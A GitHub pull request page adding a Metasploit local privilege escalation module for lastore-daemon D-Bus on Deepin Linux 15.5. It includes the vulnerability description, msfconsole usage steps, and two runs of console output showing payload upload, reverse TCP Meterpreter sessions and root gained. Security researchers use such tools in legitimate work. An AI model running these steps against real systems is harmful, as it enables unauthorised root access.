Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add lastore-daemon D-Bus Privilege Escalation exploit #9756

Merged
merged 2 commits into from Apr 20, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Mar 24, 2018

Add lastore-daemon D-Bus Privilege Escalation exploit.

        This module attempts to gain root privileges on Deepin Linux systems
        by using lastore-daemon to install a package.

        The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
        user in the sudo group to install arbitrary system packages without
        providing a password, resulting in code execution as root. By default,
        the first user created on the system is a member of the sudo group.

        This module has been tested successfully with lastore-daemon version
        0.9.53-1 on Deepin Linux 15.5 (x64).

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/lastore_daemon_dbus_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf5 > use exploit/linux/local/lastore_daemon_dbus_priv_esc 
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Building package...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 172.16.191.200
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
[+] Deleted /tmp/.1sZZ46ozIH
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.200
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
@bwatters-r7 bwatters-r7 self-assigned this Apr 20, 2018
@bwatters-r7 bwatters-r7 merged commit d5961f2 into rapid7:master Apr 20, 2018
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully ran sanity checks.
Details
Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
bwatters-r7 added a commit that referenced this pull request Apr 20, 2018
Merge branch 'land-9756' into upstream-master
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Apr 20, 2018

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Sending stage (812100 bytes) to 192.168.135.158
[*] Meterpreter session 3 opened (192.168.135.111:4567 -> 192.168.135.158:41644) at 2018-04-20 15:33:09 -0500

meterpreter > sysinfo
Computer     : 192.168.135.158
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > use exploit/linux/local/lastore_daemon_dbus_priv_esc
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 3
session => 3
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.111:4444 
[*] Building package...
[*] Writing '/tmp/.JtsRLYgyJ7fAQR/DEBIAN/control' (110 bytes) ...
[*] Writing '/tmp/.JtsRLYgyJ7fAQR/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.VqngDqJ8fr' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 192.168.135.158
[*] Meterpreter session 4 opened (192.168.135.111:4444 -> 192.168.135.158:37688) at 2018-04-20 15:34:22 -0500
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN/control
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN/postinst
[+] Deleted /tmp/.VqngDqJ8fr
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Apr 20, 2018

Release Notes

The exploits/linux/local/lastore_daemon_dbus_priv_esc module has been added to the framework. It abuses unauthenticated package installation through lastore-daemon D-Bus version 0.9.53-1 to gain root privileges on Deepin Linux 15.5 systems.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Apr 20, 2018

Thanks

@bcoles bcoles deleted the bcoles:lastore_daemon_dbus_priv_esc branch Apr 20, 2018
msjenkins-r7 added a commit that referenced this pull request Apr 23, 2018
Merge branch 'land-9756' into upstream-master
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.